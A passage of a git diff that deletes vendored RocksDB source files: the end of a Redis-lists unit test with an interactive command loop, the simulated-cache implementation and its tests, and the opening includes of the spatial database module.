-  ASSERT_EQ(redis.Length("k1"), 3);
-  ASSERT_TRUE(redis.Index("k1", -1, &tempv));
-  ASSERT_EQ(tempv, "aftera");
-  ASSERT_TRUE(redis.Trim("k1", 1, 1));                     // [a]
-  ASSERT_EQ(redis.Length("k1"), 1);
-  ASSERT_TRUE(redis.Index("k1", 0, &tempv));
-  ASSERT_EQ(tempv, "a");
-
-  // Test out of bounds (empty) trim
-  ASSERT_TRUE(redis.Trim("k1", 1, 0));
-  ASSERT_EQ(redis.Length("k1"), 0);
-
-  // Popping with empty list (return empty without error)
-  ASSERT_TRUE(!redis.PopLeft("k1", &tempv));
-  ASSERT_TRUE(!redis.PopRight("k1", &tempv));
-  ASSERT_TRUE(redis.Trim("k1", 0, 5));
-
-  // Exhaustive Trim test (negative and invalid indices)
-  // Will start in [newbegin, z, a, aftera, x, newend]
-  redis.PushLeft("k1", "a");
-  redis.PushLeft("k1", "z");
-  redis.PushRight("k1", "x");
-  redis.InsertBefore("k1", "z", "newbegin");    // InsertBefore start of list
-  redis.InsertAfter("k1", "x", "newend");       // InsertAfter end of list
-  redis.InsertAfter("k1", "a", "aftera");
-  ASSERT_TRUE(redis.Trim("k1", -6, -1));                     // Should do nothing
-  ASSERT_EQ(redis.Length("k1"), 6);
-  ASSERT_TRUE(redis.Trim("k1", 1, -2));
-  ASSERT_TRUE(redis.Index("k1", 0, &tempv));
-  ASSERT_EQ(tempv, "z");
-  ASSERT_TRUE(redis.Index("k1", 3, &tempv));
-  ASSERT_EQ(tempv, "x");
-  ASSERT_EQ(redis.Length("k1"), 4);
-  ASSERT_TRUE(redis.Trim("k1", -3, -2));
-  ASSERT_EQ(redis.Length("k1"), 2);
-}
-
-// Testing Remove, RemoveFirst, RemoveLast
-TEST_F(RedisListsTest, RemoveTest) {
-  RedisLists redis(kDefaultDbName, options, true);   // Destructive
-
-  std::string tempv;  // Used below for all Index(), PopRight(), PopLeft()
-
-  // A series of pushes and insertions
-  // Will result in [newbegin, z, a, aftera, x, newend, a, a]
-  redis.PushLeft("k1", "a");
-  redis.PushLeft("k1", "z");
-  redis.PushRight("k1", "x");
-  redis.InsertBefore("k1", "z", "newbegin");    // InsertBefore start of list
-  redis.InsertAfter("k1", "x", "newend");       // InsertAfter end of list
-  redis.InsertAfter("k1", "a", "aftera");
-  redis.PushRight("k1", "a");
-  redis.PushRight("k1", "a");
-
-  // Verify
-  ASSERT_TRUE(redis.Index("k1", 0, &tempv));
-  ASSERT_EQ(tempv, "newbegin");
-  ASSERT_TRUE(redis.Index("k1", -1, &tempv));
-  ASSERT_EQ(tempv, "a");
-
-  // Check RemoveFirst (Remove the first two 'a')
-  // Results in [newbegin, z, aftera, x, newend, a]
-  int numRemoved = redis.Remove("k1", 2, "a");
-  ASSERT_EQ(numRemoved, 2);
-  ASSERT_TRUE(redis.Index("k1", 0, &tempv));
-  ASSERT_EQ(tempv, "newbegin");
-  ASSERT_TRUE(redis.Index("k1", 1, &tempv));
-  ASSERT_EQ(tempv, "z");
-  ASSERT_TRUE(redis.Index("k1", 4, &tempv));
-  ASSERT_EQ(tempv, "newend");
-  ASSERT_TRUE(redis.Index("k1", 5, &tempv));
-  ASSERT_EQ(tempv, "a");
-  ASSERT_EQ(redis.Length("k1"), 6);
-
-  // Repopulate some stuff
-  // Results in: [x, x, x, x, x, newbegin, z, x, aftera, x, newend, a, x]
-  redis.PushLeft("k1", "x");
-  redis.PushLeft("k1", "x");
-  redis.PushLeft("k1", "x");
-  redis.PushLeft("k1", "x");
-  redis.PushLeft("k1", "x");
-  redis.PushRight("k1", "x");
-  redis.InsertAfter("k1", "z", "x");
-
-  // Test removal from end
-  numRemoved = redis.Remove("k1", -2, "x");
-  ASSERT_EQ(numRemoved, 2);
-  ASSERT_TRUE(redis.Index("k1", 8, &tempv));
-  ASSERT_EQ(tempv, "aftera");
-  ASSERT_TRUE(redis.Index("k1", 9, &tempv));
-  ASSERT_EQ(tempv, "newend");
-  ASSERT_TRUE(redis.Index("k1", 10, &tempv));
-  ASSERT_EQ(tempv, "a");
-  ASSERT_TRUE(!redis.Index("k1", 11, &tempv));
-  numRemoved = redis.Remove("k1", -2, "x");
-  ASSERT_EQ(numRemoved, 2);
-  ASSERT_TRUE(redis.Index("k1", 4, &tempv));
-  ASSERT_EQ(tempv, "newbegin");
-  ASSERT_TRUE(redis.Index("k1", 6, &tempv));
-  ASSERT_EQ(tempv, "aftera");
-
-  // We now have: [x, x, x, x, newbegin, z, aftera, newend, a]
-  ASSERT_EQ(redis.Length("k1"), 9);
-  ASSERT_TRUE(redis.Index("k1", -1, &tempv));
-  ASSERT_EQ(tempv, "a");
-  ASSERT_TRUE(redis.Index("k1", 0, &tempv));
-  ASSERT_EQ(tempv, "x");
-
-  // Test over-shooting (removing more than there exists)
-  numRemoved = redis.Remove("k1", -9000, "x");
-  ASSERT_EQ(numRemoved , 4);    // Only really removed 4
-  ASSERT_EQ(redis.Length("k1"), 5);
-  ASSERT_TRUE(redis.Index("k1", 0, &tempv));
-  ASSERT_EQ(tempv, "newbegin");
-  numRemoved = redis.Remove("k1", 1, "x");
-  ASSERT_EQ(numRemoved, 0);
-
-  // Try removing ALL!
-  numRemoved = redis.Remove("k1", 0, "newbegin");   // REMOVE 0 will remove all!
-  ASSERT_EQ(numRemoved, 1);
-
-  // Removal from an empty-list
-  ASSERT_TRUE(redis.Trim("k1", 1, 0));
-  numRemoved = redis.Remove("k1", 1, "z");
-  ASSERT_EQ(numRemoved, 0);
-}
-
-
-// Test Multiple keys and Persistence
-TEST_F(RedisListsTest, PersistenceMultiKeyTest) {
-  std::string tempv;  // Used below for all Index(), PopRight(), PopLeft()
-
-  // Block one: populate a single key in the database
-  {
-    RedisLists redis(kDefaultDbName, options, true);   // Destructive
-
-    // A series of pushes and insertions
-    // Will result in [newbegin, z, a, aftera, x, newend, a, a]
-    redis.PushLeft("k1", "a");
-    redis.PushLeft("k1", "z");
-    redis.PushRight("k1", "x");
-    redis.InsertBefore("k1", "z", "newbegin");    // InsertBefore start of list
-    redis.InsertAfter("k1", "x", "newend");       // InsertAfter end of list
-    redis.InsertAfter("k1", "a", "aftera");
-    redis.PushRight("k1", "a");
-    redis.PushRight("k1", "a");
-
-    ASSERT_TRUE(redis.Index("k1", 3, &tempv));
-    ASSERT_EQ(tempv, "aftera");
-  }
-
-  // Block two: make sure changes were saved and add some other key
-  {
-    RedisLists redis(kDefaultDbName, options, false); // Persistent, non-destructive
-
-    // Check
-    ASSERT_EQ(redis.Length("k1"), 8);
-    ASSERT_TRUE(redis.Index("k1", 3, &tempv));
-    ASSERT_EQ(tempv, "aftera");
-
-    redis.PushRight("k2", "randomkey");
-    redis.PushLeft("k2", "sas");
-
-    redis.PopLeft("k1", &tempv);
-  }
-
-  // Block three: Verify the changes from block 2
-  {
-    RedisLists redis(kDefaultDbName, options, false); // Persistent, non-destructive
-
-    // Check
-    ASSERT_EQ(redis.Length("k1"), 7);
-    ASSERT_EQ(redis.Length("k2"), 2);
-    ASSERT_TRUE(redis.Index("k1", 0, &tempv));
-    ASSERT_EQ(tempv, "z");
-    ASSERT_TRUE(redis.Index("k2", -2, &tempv));
-    ASSERT_EQ(tempv, "sas");
-  }
-}
-
-/// THE manual REDIS TEST begins here
-/// THIS WILL ONLY OCCUR IF YOU RUN: ./redis_test -m
-
-namespace {
-void MakeUpper(std::string* const s) {
-  int len = static_cast<int>(s->length());
-  for (int i = 0; i < len; ++i) {
-    (*s)[i] = toupper((*s)[i]);  // C-version defined in <ctype.h>
-  }
-}
-
-/// Allows the user to enter in REDIS commands into the command-line.
-/// This is useful for manual / interacticve testing / debugging.
-///  Use destructive=true to clean the database before use.
-///  Use destructive=false to remember the previous state (i.e.: persistent)
-/// Should be called from main function.
-int manual_redis_test(bool destructive){
-  RedisLists redis(RedisListsTest::kDefaultDbName,
-                   RedisListsTest::options,
-                   destructive);
-
-  // TODO: Right now, please use spaces to separate each word.
-  //  In actual redis, you can use quotes to specify compound values
-  //  Example: RPUSH mylist "this is a compound value"
-
-  std::string command;
-  while(true) {
-    std::cin >> command;
-    MakeUpper(&command);
-
-    if (command == "LINSERT") {
-      std::string k, t, p, v;
-      std::cin >> k >> t >> p >> v;
-      MakeUpper(&t);
-      if (t=="BEFORE") {
-        std::cout << redis.InsertBefore(k, p, v) << std::endl;
-      } else if (t=="AFTER") {
-        std::cout << redis.InsertAfter(k, p, v) << std::endl;
-      }
-    } else if (command == "LPUSH") {
-      std::string k, v;
-      std::cin >> k >> v;
-      redis.PushLeft(k, v);
-    } else if (command == "RPUSH") {
-      std::string k, v;
-      std::cin >> k >> v;
-      redis.PushRight(k, v);
-    } else if (command == "LPOP") {
-      std::string k;
-      std::cin >> k;
-      std::string res;
-      redis.PopLeft(k, &res);
-      std::cout << res << std::endl;
-    } else if (command == "RPOP") {
-      std::string k;
-      std::cin >> k;
-      std::string res;
-      redis.PopRight(k, &res);
-      std::cout << res << std::endl;
-    } else if (command == "LREM") {
-      std::string k;
-      int amt;
-      std::string v;
-
-      std::cin >> k >> amt >> v;
-      std::cout << redis.Remove(k, amt, v) << std::endl;
-    } else if (command == "LLEN") {
-      std::string k;
-      std::cin >> k;
-      std::cout << redis.Length(k) << std::endl;
-    } else if (command == "LRANGE") {
-      std::string k;
-      int i, j;
-      std::cin >> k >> i >> j;
-      std::vector<std::string> res = redis.Range(k, i, j);
-      for (auto it = res.begin(); it != res.end(); ++it) {
-        std::cout << " " << (*it);
-      }
-      std::cout << std::endl;
-    } else if (command == "LTRIM") {
-      std::string k;
-      int i, j;
-      std::cin >> k >> i >> j;
-      redis.Trim(k, i, j);
-    } else if (command == "LSET") {
-      std::string k;
-      int idx;
-      std::string v;
-      std::cin >> k >> idx >> v;
-      redis.Set(k, idx, v);
-    } else if (command == "LINDEX") {
-      std::string k;
-      int idx;
-      std::cin >> k >> idx;
-      std::string res;
-      redis.Index(k, idx, &res);
-      std::cout << res << std::endl;
-    } else if (command == "PRINT") {      // Added by Deon
-      std::string k;
-      std::cin >> k;
-      redis.Print(k);
-    } else if (command == "QUIT") {
-      return 0;
-    } else {
-      std::cout << "unknown command: " << command << std::endl;
-    }
-  }
-}
-}  // namespace
-
-} // namespace rocksdb
-
-
-// USAGE: "./redis_test" for default (unit tests)
-//        "./redis_test -m" for manual testing (redis command api)
-//        "./redis_test -m -d" for destructive manual test (erase db before use)
-
-
-namespace {
-// Check for "want" argument in the argument list
-bool found_arg(int argc, char* argv[], const char* want){
-  for(int i=1; i<argc; ++i){
-    if (strcmp(argv[i], want) == 0) {
-      return true;
-    }
-  }
-  return false;
-}
-}  // namespace
-
-// Will run unit tests.
-// However, if -m is specified, it will do user manual/interactive testing
-// -m -d is manual and destructive (will clear the database before use)
-int main(int argc, char* argv[]) {
-  ::testing::InitGoogleTest(&argc, argv);
-  if (found_arg(argc, argv, "-m")) {
-    bool destructive = found_arg(argc, argv, "-d");
-    return rocksdb::manual_redis_test(destructive);
-  } else {
-    return RUN_ALL_TESTS();
-  }
-}
-
-#else
-#include <stdio.h>
-
-int main(int argc, char* argv[]) {
-  fprintf(stderr, "SKIPPED as redis is not supported in ROCKSDB_LITE\n");
-  return 0;
-}
-
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/simulator_cache/sim_cache.cc b/thirdparty/rocksdb/utilities/simulator_cache/sim_cache.cc
deleted file mode 100644
index e3d8016..0000000
--- a/thirdparty/rocksdb/utilities/simulator_cache/sim_cache.cc
+++ /dev/null
@@ -1,341 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "rocksdb/utilities/sim_cache.h"
-#include <atomic>
-#include "monitoring/statistics.h"
-#include "port/port.h"
-#include "rocksdb/env.h"
-#include "util/file_reader_writer.h"
-#include "util/mutexlock.h"
-#include "util/string_util.h"
-
-namespace rocksdb {
-
-namespace {
-
-class CacheActivityLogger {
- public:
-  CacheActivityLogger()
-      : activity_logging_enabled_(false), max_logging_size_(0) {}
-
-  ~CacheActivityLogger() {
-    MutexLock l(&mutex_);
-
-    StopLoggingInternal();
-  }
-
-  Status StartLogging(const std::string& activity_log_file, Env* env,
-                      uint64_t max_logging_size = 0) {
-    assert(activity_log_file != "");
-    assert(env != nullptr);
-
-    Status status;
-    EnvOptions env_opts;
-    std::unique_ptr<WritableFile> log_file;
-
-    MutexLock l(&mutex_);
-
-    // Stop existing logging if any
-    StopLoggingInternal();
-
-    // Open log file
-    status = env->NewWritableFile(activity_log_file, &log_file, env_opts);
-    if (!status.ok()) {
-      return status;
-    }
-    file_writer_.reset(new WritableFileWriter(std::move(log_file), env_opts));
-
-    max_logging_size_ = max_logging_size;
-    activity_logging_enabled_.store(true);
-
-    return status;
-  }
-
-  void StopLogging() {
-    MutexLock l(&mutex_);
-
-    StopLoggingInternal();
-  }
-
-  void ReportLookup(const Slice& key) {
-    if (activity_logging_enabled_.load() == false) {
-      return;
-    }
-
-    std::string log_line = "LOOKUP - " + key.ToString(true) + "\n";
-
-    // line format: "LOOKUP - <KEY>"
-    MutexLock l(&mutex_);
-    Status s = file_writer_->Append(log_line);
-    if (!s.ok() && bg_status_.ok()) {
-      bg_status_ = s;
-    }
-    if (MaxLoggingSizeReached() || !bg_status_.ok()) {
-      // Stop logging if we have reached the max file size or
-      // encountered an error
-      StopLoggingInternal();
-    }
-  }
-
-  void ReportAdd(const Slice& key, size_t size) {
-    if (activity_logging_enabled_.load() == false) {
-      return;
-    }
-
-    std::string log_line = "ADD - ";
-    log_line += key.ToString(true);
-    log_line += " - ";
-    AppendNumberTo(&log_line, size);
-		log_line += "\n";
-
-    // line format: "ADD - <KEY> - <KEY-SIZE>"
-    MutexLock l(&mutex_);
-    Status s = file_writer_->Append(log_line);
-    if (!s.ok() && bg_status_.ok()) {
-      bg_status_ = s;
-    }
-
-    if (MaxLoggingSizeReached() || !bg_status_.ok()) {
-      // Stop logging if we have reached the max file size or
-      // encountered an error
-      StopLoggingInternal();
-    }
-  }
-
-  Status& bg_status() {
-    MutexLock l(&mutex_);
-    return bg_status_;
-  }
-
- private:
-  bool MaxLoggingSizeReached() {
-    mutex_.AssertHeld();
-
-    return (max_logging_size_ > 0 &&
-            file_writer_->GetFileSize() >= max_logging_size_);
-  }
-
-  void StopLoggingInternal() {
-    mutex_.AssertHeld();
-
-    if (!activity_logging_enabled_) {
-      return;
-    }
-
-    activity_logging_enabled_.store(false);
-    Status s = file_writer_->Close();
-    if (!s.ok() && bg_status_.ok()) {
-      bg_status_ = s;
-    }
-  }
-
-  // Mutex to sync writes to file_writer, and all following
-  // class data members
-  port::Mutex mutex_;
-  // Indicates if logging is currently enabled
-  // atomic to allow reads without mutex
-  std::atomic<bool> activity_logging_enabled_;
-  // When reached, we will stop logging and close the file
-  // Value of 0 means unlimited
-  uint64_t max_logging_size_;
-  std::unique_ptr<WritableFileWriter> file_writer_;
-  Status bg_status_;
-};
-
-// SimCacheImpl definition
-class SimCacheImpl : public SimCache {
- public:
-  // capacity for real cache (ShardedLRUCache)
-  // test_capacity for key only cache
-  SimCacheImpl(std::shared_ptr<Cache> cache, size_t sim_capacity,
-               int num_shard_bits)
-      : cache_(cache),
-        key_only_cache_(NewLRUCache(sim_capacity, num_shard_bits)),
-        miss_times_(0),
-        hit_times_(0) {}
-
-  virtual ~SimCacheImpl() {}
-  virtual void SetCapacity(size_t capacity) override {
-    cache_->SetCapacity(capacity);
-  }
-
-  virtual void SetStrictCapacityLimit(bool strict_capacity_limit) override {
-    cache_->SetStrictCapacityLimit(strict_capacity_limit);
-  }
-
-  virtual Status Insert(const Slice& key, void* value, size_t charge,
-                        void (*deleter)(const Slice& key, void* value),
-                        Handle** handle, Priority priority) override {
-    // The handle and value passed in are for real cache, so we pass nullptr
-    // to key_only_cache_ for both instead. Also, the deleter function pointer
-    // will be called by user to perform some external operation which should
-    // be applied only once. Thus key_only_cache accepts an empty function.
-    // *Lambda function without capture can be assgined to a function pointer
-    Handle* h = key_only_cache_->Lookup(key);
-    if (h == nullptr) {
-      key_only_cache_->Insert(key, nullptr, charge,
-                              [](const Slice& k, void* v) {}, nullptr,
-                              priority);
-    } else {
-      key_only_cache_->Release(h);
-    }
-
-    cache_activity_logger_.ReportAdd(key, charge);
-
-    return cache_->Insert(key, value, charge, deleter, handle, priority);
-  }
-
-  virtual Handle* Lookup(const Slice& key, Statistics* stats) override {
-    Handle* h = key_only_cache_->Lookup(key);
-    if (h != nullptr) {
-      key_only_cache_->Release(h);
-      inc_hit_counter();
-      RecordTick(stats, SIM_BLOCK_CACHE_HIT);
-    } else {
-      inc_miss_counter();
-      RecordTick(stats, SIM_BLOCK_CACHE_MISS);
-    }
-
-    cache_activity_logger_.ReportLookup(key);
-
-    return cache_->Lookup(key, stats);
-  }
-
-  virtual bool Ref(Handle* handle) override { return cache_->Ref(handle); }
-
-  virtual bool Release(Handle* handle, bool force_erase = false) override {
-    return cache_->Release(handle, force_erase);
-  }
-
-  virtual void Erase(const Slice& key) override {
-    cache_->Erase(key);
-    key_only_cache_->Erase(key);
-  }
-
-  virtual void* Value(Handle* handle) override { return cache_->Value(handle); }
-
-  virtual uint64_t NewId() override { return cache_->NewId(); }
-
-  virtual size_t GetCapacity() const override { return cache_->GetCapacity(); }
-
-  virtual bool HasStrictCapacityLimit() const override {
-    return cache_->HasStrictCapacityLimit();
-  }
-
-  virtual size_t GetUsage() const override { return cache_->GetUsage(); }
-
-  virtual size_t GetUsage(Handle* handle) const override {
-    return cache_->GetUsage(handle);
-  }
-
-  virtual size_t GetPinnedUsage() const override {
-    return cache_->GetPinnedUsage();
-  }
-
-  virtual void DisownData() override {
-    cache_->DisownData();
-    key_only_cache_->DisownData();
-  }
-
-  virtual void ApplyToAllCacheEntries(void (*callback)(void*, size_t),
-                                      bool thread_safe) override {
-    // only apply to _cache since key_only_cache doesn't hold value
-    cache_->ApplyToAllCacheEntries(callback, thread_safe);
-  }
-
-  virtual void EraseUnRefEntries() override {
-    cache_->EraseUnRefEntries();
-    key_only_cache_->EraseUnRefEntries();
-  }
-
-  virtual size_t GetSimCapacity() const override {
-    return key_only_cache_->GetCapacity();
-  }
-  virtual size_t GetSimUsage() const override {
-    return key_only_cache_->GetUsage();
-  }
-  virtual void SetSimCapacity(size_t capacity) override {
-    key_only_cache_->SetCapacity(capacity);
-  }
-
-  virtual uint64_t get_miss_counter() const override {
-    return miss_times_.load(std::memory_order_relaxed);
-  }
-
-  virtual uint64_t get_hit_counter() const override {
-    return hit_times_.load(std::memory_order_relaxed);
-  }
-
-  virtual void reset_counter() override {
-    miss_times_.store(0, std::memory_order_relaxed);
-    hit_times_.store(0, std::memory_order_relaxed);
-    SetTickerCount(stats_, SIM_BLOCK_CACHE_HIT, 0);
-    SetTickerCount(stats_, SIM_BLOCK_CACHE_MISS, 0);
-  }
-
-  virtual std::string ToString() const override {
-    std::string res;
-    res.append("SimCache MISSes: " + std::to_string(get_miss_counter()) + "\n");
-    res.append("SimCache HITs:    " + std::to_string(get_hit_counter()) + "\n");
-    char buff[350];
-    auto lookups = get_miss_counter() + get_hit_counter();
-    snprintf(buff, sizeof(buff), "SimCache HITRATE: %.2f%%\n",
-             (lookups == 0 ? 0 : get_hit_counter() * 100.0f / lookups));
-    res.append(buff);
-    return res;
-  }
-
-  virtual std::string GetPrintableOptions() const override {
-    std::string ret;
-    ret.reserve(20000);
-    ret.append("    cache_options:\n");
-    ret.append(cache_->GetPrintableOptions());
-    ret.append("    sim_cache_options:\n");
-    ret.append(key_only_cache_->GetPrintableOptions());
-    return ret;
-  }
-
-  virtual Status StartActivityLogging(const std::string& activity_log_file,
-                                      Env* env,
-                                      uint64_t max_logging_size = 0) override {
-    return cache_activity_logger_.StartLogging(activity_log_file, env,
-                                               max_logging_size);
-  }
-
-  virtual void StopActivityLogging() override {
-    cache_activity_logger_.StopLogging();
-  }
-
-  virtual Status GetActivityLoggingStatus() override {
-    return cache_activity_logger_.bg_status();
-  }
-
- private:
-  std::shared_ptr<Cache> cache_;
-  std::shared_ptr<Cache> key_only_cache_;
-  std::atomic<uint64_t> miss_times_;
-  std::atomic<uint64_t> hit_times_;
-  Statistics* stats_;
-  CacheActivityLogger cache_activity_logger_;
-
-  void inc_miss_counter() {
-    miss_times_.fetch_add(1, std::memory_order_relaxed);
-  }
-  void inc_hit_counter() { hit_times_.fetch_add(1, std::memory_order_relaxed); }
-};
-
-}  // end anonymous namespace
-
-// For instrumentation purpose, use NewSimCache instead
-std::shared_ptr<SimCache> NewSimCache(std::shared_ptr<Cache> cache,
-                                      size_t sim_capacity, int num_shard_bits) {
-  if (num_shard_bits >= 20) {
-    return nullptr;  // the cache cannot be sharded into too many fine pieces
-  }
-  return std::make_shared<SimCacheImpl>(cache, sim_capacity, num_shard_bits);
-}
-
-}  // end namespace rocksdb
diff --git a/thirdparty/rocksdb/utilities/simulator_cache/sim_cache_test.cc b/thirdparty/rocksdb/utilities/simulator_cache/sim_cache_test.cc
deleted file mode 100644
index 4c175c9..0000000
--- a/thirdparty/rocksdb/utilities/simulator_cache/sim_cache_test.cc
+++ /dev/null
@@ -1,218 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "rocksdb/utilities/sim_cache.h"
-#include <cstdlib>
-#include "db/db_test_util.h"
-#include "port/stack_trace.h"
-
-namespace rocksdb {
-
-class SimCacheTest : public DBTestBase {
- private:
-  size_t miss_count_ = 0;
-  size_t hit_count_ = 0;
-  size_t insert_count_ = 0;
-  size_t failure_count_ = 0;
-
- public:
-  const size_t kNumBlocks = 5;
-  const size_t kValueSize = 1000;
-
-  SimCacheTest() : DBTestBase("/sim_cache_test") {}
-
-  BlockBasedTableOptions GetTableOptions() {
-    BlockBasedTableOptions table_options;
-    // Set a small enough block size so that each key-value get its own block.
-    table_options.block_size = 1;
-    return table_options;
-  }
-
-  Options GetOptions(const BlockBasedTableOptions& table_options) {
-    Options options = CurrentOptions();
-    options.create_if_missing = true;
-    // options.compression = kNoCompression;
-    options.statistics = rocksdb::CreateDBStatistics();
-    options.table_factory.reset(new BlockBasedTableFactory(table_options));
-    return options;
-  }
-
-  void InitTable(const Options& options) {
-    std::string value(kValueSize, 'a');
-    for (size_t i = 0; i < kNumBlocks * 2; i++) {
-      ASSERT_OK(Put(ToString(i), value.c_str()));
-    }
-  }
-
-  void RecordCacheCounters(const Options& options) {
-    miss_count_ = TestGetTickerCount(options, BLOCK_CACHE_MISS);
-    hit_count_ = TestGetTickerCount(options, BLOCK_CACHE_HIT);
-    insert_count_ = TestGetTickerCount(options, BLOCK_CACHE_ADD);
-    failure_count_ = TestGetTickerCount(options, BLOCK_CACHE_ADD_FAILURES);
-  }
-
-  void CheckCacheCounters(const Options& options, size_t expected_misses,
-                          size_t expected_hits, size_t expected_inserts,
-                          size_t expected_failures) {
-    size_t new_miss_count = TestGetTickerCount(options, BLOCK_CACHE_MISS);
-    size_t new_hit_count = TestGetTickerCount(options, BLOCK_CACHE_HIT);
-    size_t new_insert_count = TestGetTickerCount(options, BLOCK_CACHE_ADD);
-    size_t new_failure_count =
-        TestGetTickerCount(options, BLOCK_CACHE_ADD_FAILURES);
-    ASSERT_EQ(miss_count_ + expected_misses, new_miss_count);
-    ASSERT_EQ(hit_count_ + expected_hits, new_hit_count);
-    ASSERT_EQ(insert_count_ + expected_inserts, new_insert_count);
-    ASSERT_EQ(failure_count_ + expected_failures, new_failure_count);
-    miss_count_ = new_miss_count;
-    hit_count_ = new_hit_count;
-    insert_count_ = new_insert_count;
-    failure_count_ = new_failure_count;
-  }
-};
-
-TEST_F(SimCacheTest, SimCache) {
-  ReadOptions read_options;
-  auto table_options = GetTableOptions();
-  auto options = GetOptions(table_options);
-  InitTable(options);
-  std::shared_ptr<SimCache> simCache =
-      NewSimCache(NewLRUCache(0, 0, false), 20000, 0);
-  table_options.block_cache = simCache;
-  options.table_factory.reset(new BlockBasedTableFactory(table_options));
-  Reopen(options);
-  RecordCacheCounters(options);
-
-  std::vector<std::unique_ptr<Iterator>> iterators(kNumBlocks);
-  Iterator* iter = nullptr;
-
-  // Load blocks into cache.
-  for (size_t i = 0; i < kNumBlocks; i++) {
-    iter = db_->NewIterator(read_options);
-    iter->Seek(ToString(i));
-    ASSERT_OK(iter->status());
-    CheckCacheCounters(options, 1, 0, 1, 0);
-    iterators[i].reset(iter);
-  }
-  ASSERT_EQ(kNumBlocks,
-            simCache->get_hit_counter() + simCache->get_miss_counter());
-  ASSERT_EQ(0, simCache->get_hit_counter());
-  size_t usage = simCache->GetUsage();
-  ASSERT_LT(0, usage);
-  ASSERT_EQ(usage, simCache->GetSimUsage());
-  simCache->SetCapacity(usage);
-  ASSERT_EQ(usage, simCache->GetPinnedUsage());
-
-  // Test with strict capacity limit.
-  simCache->SetStrictCapacityLimit(true);
-  iter = db_->NewIterator(read_options);
-  iter->Seek(ToString(kNumBlocks * 2 - 1));
-  ASSERT_TRUE(iter->status().IsIncomplete());
-  CheckCacheCounters(options, 1, 0, 0, 1);
-  delete iter;
-  iter = nullptr;
-
-  // Release iterators and access cache again.
-  for (size_t i = 0; i < kNumBlocks; i++) {
-    iterators[i].reset();
-    CheckCacheCounters(options, 0, 0, 0, 0);
-  }
-  // Add kNumBlocks again
-  for (size_t i = 0; i < kNumBlocks; i++) {
-    std::unique_ptr<Iterator> it(db_->NewIterator(read_options));
-    it->Seek(ToString(i));
-    ASSERT_OK(it->status());
-    CheckCacheCounters(options, 0, 1, 0, 0);
-  }
-  ASSERT_EQ(5, simCache->get_hit_counter());
-  for (size_t i = kNumBlocks; i < kNumBlocks * 2; i++) {
-    std::unique_ptr<Iterator> it(db_->NewIterator(read_options));
-    it->Seek(ToString(i));
-    ASSERT_OK(it->status());
-    CheckCacheCounters(options, 1, 0, 1, 0);
-  }
-  ASSERT_EQ(0, simCache->GetPinnedUsage());
-  ASSERT_EQ(3 * kNumBlocks + 1,
-            simCache->get_hit_counter() + simCache->get_miss_counter());
-  ASSERT_EQ(6, simCache->get_hit_counter());
-}
-
-TEST_F(SimCacheTest, SimCacheLogging) {
-  auto table_options = GetTableOptions();
-  auto options = GetOptions(table_options);
-  options.disable_auto_compactions = true;
-  std::shared_ptr<SimCache> sim_cache =
-      NewSimCache(NewLRUCache(1024 * 1024), 20000, 0);
-  table_options.block_cache = sim_cache;
-  options.table_factory.reset(new BlockBasedTableFactory(table_options));
-  Reopen(options);
-
-  int num_block_entries = 20;
-  for (int i = 0; i < num_block_entries; i++) {
-    Put(Key(i), "val");
-    Flush();
-  }
-
-  std::string log_file = test::TmpDir(env_) + "/cache_log.txt";
-  ASSERT_OK(sim_cache->StartActivityLogging(log_file, env_));
-  for (int i = 0; i < num_block_entries; i++) {
-    ASSERT_EQ(Get(Key(i)), "val");
-  }
-  for (int i = 0; i < num_block_entries; i++) {
-    ASSERT_EQ(Get(Key(i)), "val");
-  }
-  sim_cache->StopActivityLogging();
-  ASSERT_OK(sim_cache->GetActivityLoggingStatus());
-
-  std::string file_contents = "";
-  ReadFileToString(env_, log_file, &file_contents);
-
-  int lookup_num = 0;
-  int add_num = 0;
-  std::string::size_type pos;
-
-  // count number of lookups
-  pos = 0;
-  while ((pos = file_contents.find("LOOKUP -", pos)) != std::string::npos) {
-    ++lookup_num;
-    pos += 1;
-  }
-
-  // count number of additions
-  pos = 0;
-  while ((pos = file_contents.find("ADD -", pos)) != std::string::npos) {
-    ++add_num;
-    pos += 1;
-  }
-
-  // We asked for every block twice
-  ASSERT_EQ(lookup_num, num_block_entries * 2);
-
-  // We added every block only once, since the cache can hold all blocks
-  ASSERT_EQ(add_num, num_block_entries);
-
-  // Log things again but stop logging automatically after reaching 512 bytes
-	int max_size = 512;
-  ASSERT_OK(sim_cache->StartActivityLogging(log_file, env_, max_size));
-  for (int it = 0; it < 10; it++) {
-    for (int i = 0; i < num_block_entries; i++) {
-      ASSERT_EQ(Get(Key(i)), "val");
-    }
-  }
-  ASSERT_OK(sim_cache->GetActivityLoggingStatus());
-
-  uint64_t fsize = 0;
-  ASSERT_OK(env_->GetFileSize(log_file, &fsize));
-	// error margin of 100 bytes
-  ASSERT_LT(fsize, max_size + 100);
-	ASSERT_GT(fsize, max_size - 100);
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  rocksdb::port::InstallStackTraceHandler();
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/utilities/spatialdb/spatial_db.cc b/thirdparty/rocksdb/utilities/spatialdb/spatial_db.cc
deleted file mode 100644
index 539ddd0..0000000
--- a/thirdparty/rocksdb/utilities/spatialdb/spatial_db.cc
+++ /dev/null
@@ -1,919 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#include "rocksdb/utilities/spatial_db.h"
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include <algorithm>
-#include <condition_variable>
-#include <inttypes.h>
-#include <string>
-#include <vector>
-#include <mutex>
-#include <thread>
-#include <set>
-#include <unordered_set>
-
-#include "rocksdb/cache.h"
-#include "rocksdb/options.h"
-#include "rocksdb/memtablerep.h"
